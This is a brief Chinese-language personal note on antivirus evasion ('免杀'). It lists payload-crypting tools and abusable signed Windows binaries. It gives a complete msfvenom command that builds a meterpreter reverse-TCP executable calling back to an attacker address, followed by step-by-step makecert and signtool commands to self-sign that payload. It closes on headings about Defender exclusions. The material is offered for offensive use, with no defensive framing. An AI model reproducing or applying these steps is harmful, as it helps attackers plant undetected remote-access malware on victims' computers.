<aside>
💡 Notion Tip: 免杀笔记.
</aside>
参考
常见工具
- msf、Veil、Venom、Shellter、BackDoor-Factory、Avet、TheFatRat、Avoidz、Green-Hat-Suite、zirikatu、AVIator、DKMC、Unicorn、Python-Rootkit、ASWCrypter、nps_payload、GreatSCT、HERCULES、SpookFlare、SharpShooter、CACTUSTORCH、Winpayload等
白名单程序
- Rundll32.exe、Msiexec.exe、MSBuild.exe、InstallUtil.exe、Mshta.exe、Regsvr32.exe、Cmstp.exe、CScript.exe、WScript.exe、Forfiles.exe、te.exe、Odbcconf.exe、InfDefaultInstall.exe、Diskshadow.exe、PsExec.exe、Msdeploy.exe、Winword.exe、Regasm.exe、Regsvcs.exe、Ftp.exe、pubprn.vbs、winrm.vbs、slmgr.vbs、Xwizard.exe、Compiler.exe、IEExec.exe、MavInject32、Presentationhost.exe、Wmic.exe、Pcalua.exe、Url.dll、zipfldr.dll、Syncappvpublishingserver.vbs等
证书、数字签名
- msf简单做个反向的马子
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.101.129 LPORT=4444 -f exe > /home/tttx/tools/msf.exe
- 自制签名
- windows可使用自带的工具,安装了windows sdk 或者安装VS studio 使用vs 的命令行都可以:需要使用Visual Studio命令提示符在命令行上使用makecert实用程序,
Developer Command Prompt
- 创建自签名的证书和公钥
makecert -r -sv test_key.pvk -n "CN=test_test_test_hcak" test.cer
- 生成发行者证书
cert2spc test.cer test.spc
- 生成PFX格式的证书
pvk2pfx -pvk test_key.pvk -pi [password] -spc test.spc -pfx test.pfx -po [password]
- 使用pfx格式的证书对可执行文件进行签名
signtool sign /f test.pfx /p [password] msf.exe
- 使用信誉好的软件包签名
WD Bypass默认排除项